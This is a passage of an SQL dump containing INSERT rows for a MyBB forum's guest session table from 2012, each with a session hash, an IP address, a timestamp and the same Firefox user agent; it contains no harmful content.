`mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('cdb3c04638fd3ef1dbd03b5b47e3fc7f', '0', '242.142.81.6', '1352772041', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('15c0e38e725217c464dc5b20c13ef2f9', '0', '87.49.46.50', '1352772042', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2458a67be2257f30ee9a6ea81f1d1cfd', '0', '184.139.179.238', '1352772044', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('57753115eacd9b566abe7bff2c95f64e', '0', '88.130.37.238', '1352772044', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d6f4ce5c7ac1aef168d94e0e54feec05', '0', '174.212.138.213', '1352772045', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ffd4b3fc3cbcd80686b655ec2aa97dda', '0', '166.161.248.254', '1352772046', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3dc7591e322c2f54f90dbfb7ff96db1a', '0', '130.187.17.213', '1352772046', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7e58b556caae1714c67820b54d404480', '0', '230.218.109.38', '1352772047', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('959524c6e56ab66400100f3c95cd8349', '0', '113.126.135.43', '1352772047', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9e3620e378fb672adce4fb366b35fa62', '0', '45.18.246.58', '1352772048', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('017822dfcdc731876e182ef593434963', '0', '170.48.176.138', '1352772049', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9671eb73c8281cbf0f1c31cfd9db9a75', '0', '203.187.179.155', '1352772050', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3acdedcd6763126c4c0441f59c632eb6', '0', '191.53.157.89', '1352772050', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f6f994fab20f9f44676da4733bcbe8ae', '0', '220.194.29.36', '1352772051', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0d95e01e0631167ba5872e520b0d0d36', '0', '144.79.212.40', '1352772053', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2c655763acbcb20b9cdc78d7a48ca5df', '0', '157.91.245.175', '1352772053', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6b92026e3c9af7abf64b5559b1ffd2ef', '0', '121.21.126.200', '1352772054', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c6657f4d67d9f9f12eba8bb679889355', '0', '80.85.205.220', '1352772055', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f41d00374048bf9f607a30a58822dd78', '0', '130.198.33.179', '1352772059', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('965974f81442ffd621d3e8088c3bf5c8', '0', '166.81.225.52', '1352772061', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('255ed04a5adea8f44a01fc759e8ace5c', '0', '191.127.90.25', '1352772062', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b83e3368df7227a07219a9635cdb5c66', '0', '126.25.24.129', '1352772062', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bda4601d1cebf65e4c535633f88f25a3', '0', '165.74.100.123', '1352772063', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('48a8437701cf68717385a3ded0631a9c', '0', '47.168.31.114', '1352772063', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b4bbf788f196ddf80427320a7a37b3fa', '0', '118.179.194.58', '1352772065', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c2909ddd5e4d52887c9b816de3815f75', '0', '215.6.140.75', '1352772066', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9a3d0d2999a2726d74271d55e5ef01fb', '0', '0.228.44.94', '1352772066', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fcce30735a0089e2d7d8124d597b6e60', '0', '69.149.103.249', '1352772067', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('8f408651b6b689f72e4f8fa74bf5be96', '0', '20.172.151.252', '1352772068', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3880d653c837477dad15ca01177a40eb', '0', '24.186.227.157', '1352772069', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e73eeb5ad7910b3713035df460fbb441', '0', '39.99.48.63', '1352772070', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('55278bd1a5b32d969b0ea8beae6182a0', '0', '151.130.223.219', '1352772072', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('da7961d9626f41a0e2e4f113d0876a8d', '0', '233.144.157.187', '1352772073', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0795b1a6131828519c5283e9eadb70b6', '0', '255.89.47.49', '1352772073', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('808223eb6f270952ac8ee4bdad5abcec', '0', '83.136.43.2', '1352772076', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('037dcd5d97c33b1058c3809c09a76bc7', '0', '208.94.101.101', '1352772082', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('04cabec7c135fddb0ef4b0050677f0e2', '0', '135.111.113.211', '1352772083', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a26a3791262e87403fd043dc72955f26', '0', '71.142.172.59', '1352772083', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('58dce1d2855c3a5f3a7b7ec6acbb3cb0', '0', '250.228.138.147', '1352772084', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b059dc023acf7bd1cb0e41d7f13bd029', '0', '100.102.132.49', '1352772085', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('876392dfcb6757ff1a4f856121aadf04', '0', '101.45.45.66', '1352772085', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2285a352560ad0a99f928283e67ab335', '0', '98.231.69.102', '1352772086', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d5a7c1f2bc22434543ee8ead6202742b', '0', '72.25.96.18', '1352772087', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bdc510f8a9fcf68423626d0dc06722b1', '0', '138.77.118.202', '1352772087', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6757806b5bd08547f69a0ec326c010b4', '0', '52.47.54.139', '1352772089', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ef1e09a7776c6032e14633d4e79135a5', '0', '14.7.105.255', '1352772089', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d670c42b1e7473a19cc9bdac91bd2fdc', '0', '179.13.128.249', '1352772090', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1bea869f1df03e63456798be34d917d9', '0', '229.51.38.173', '1352772091', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6b775b078daa150ab6bab4af52e8fafb', '0', '5.159.252.43', '1352772092', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('80316c56f781346aea1401d0fd70fe81', '0', '231.56.84.192', '1352772092', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b53495ee14eda7c47baf882127ce2324', '0', '21.236.121.106', '1352772094', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bf907930e9fef5be6503e33723c4d346', '0', '76.107.227.124', '1352772098', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f13b4898aa5768bcf91be9270a0f1323', '0', '225.169.200.67', '1352772099', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c953742b2bf66c07299bb374ca78b39d', '0', '105.63.7.82', '1352772101', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5295db3cd257aac0c9f58a3a0adcc244', '0', '142.62.43.144', '1352772102', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5cfc82d79f85887a21f5f0da1b6cbfd8', '0', '18.131.74.168', '1352772103', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b11c4129d3c25dfc3ac2be03acdeb4eb', '0', '27.103.153.12', '1352772107', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('20ba6018ba3fc6ca2e1a6d3c04d291f2', '0', '113.109.90.120', '1352772108', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e8bfef5f117b622ee208b61a77ce89b1', '0', '132.123.105.62', '1352772109', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('7c4018185a83bad7d41898a1298bcaf2', '0', '214.252.213.137', '1352772110', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('44d56216ced0d5c3dd2830f44263a34f', '0', '225.106.53.27', '1352772111', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('debea21c600d3a40ba1ef76a6f2ba5ce', '0', '54.202.253.174', '1352772114', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2c0bc644f88ff4d05e9268176f8c8944', '0', '127.183.181.239', '1352772115', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6df5580b41b4e1afda020f75f4753548', '0', '131.154.96.184', '1352772115', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('dedf273f06525cdfc7fde107324d9da9', '0', '22.170.96.154', '1352772116', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1053959467f98148dda7227c43fcec9a', '0', '94.43.243.107', '1352772117', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5a3a5bcdababd32dae25cf5edfc190e2', '0', '18.6.72.153', '1352772118', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('104aba5257758f7f4b439f714d609db5', '0', '212.95.240.8', '1352772119', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f6ea919d051dccc4378caf3dcd6a8896', '0', '48.228.43.34', '1352772120', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('07d0d928bc1fce2037b94ab24dd9127d', '0', '213.231.128.122', '1352772120', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6b8bdc8980d113c8b4536cd032f8af32', '0', '231.96.42.205', '1352772121', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b02febf5253a69935d9f01997a79da30', '0', '115.254.120.160', '1352772121', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3a5a325349830c1bda66a919405ab41e', '0', '140.31.202.136', '1352772122', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e75e34a4fe649a3daa967cd1be4f156c', '0', '143.202.152.169', '1352772123', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('09c65d705661b3b9eff33d7c405709c5', '0', '201.104.76.150', '1352772124', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('814f2af862fdaf27dced183a1fa0c4e9', '0', '227.151.123.186', '1352772125', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('579ee3f0d4807b6a1002b18dceff37b2', '0', '67.39.2.181', '1352772128', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('97e00ef21a2bc0d025d3c5fa5fd2854c', '0', '233.111.209.43', '1352772128', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('25a30982159bb28991ddd76ce0997ee8', '0', '55.52.182.246', '1352772129', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, 